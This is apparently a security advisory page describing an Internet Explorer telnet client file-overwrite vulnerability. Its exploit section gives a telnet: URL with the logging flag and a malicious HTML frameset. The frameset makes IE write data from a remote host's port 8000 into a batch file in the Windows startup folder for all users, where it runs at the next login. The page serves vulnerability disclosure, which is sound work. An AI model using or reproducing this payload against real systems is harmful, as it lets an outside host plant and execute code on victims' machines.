• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• RSS
• News
• Vulns
• Product Search

• info
• discussion
• exploit
• solution
• references

Microsoft IE Telnet Client File Overwrite Vulnerability

The following exploit has been provided by Oliver Friedrichs <of@securityfocus.com>:

The following URL will cause IE to connect to the host and initiate the logging function:

telnet:-f%20\file.txt%20host

The following is an example of a malicious HTML message which could cause data that is received from the destination port on the host "host" to be written to the file "filename" in the startup directory for all users. If the logged in user has the appropriate permissions, a batch file will be created and executed upon future authentication.

<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>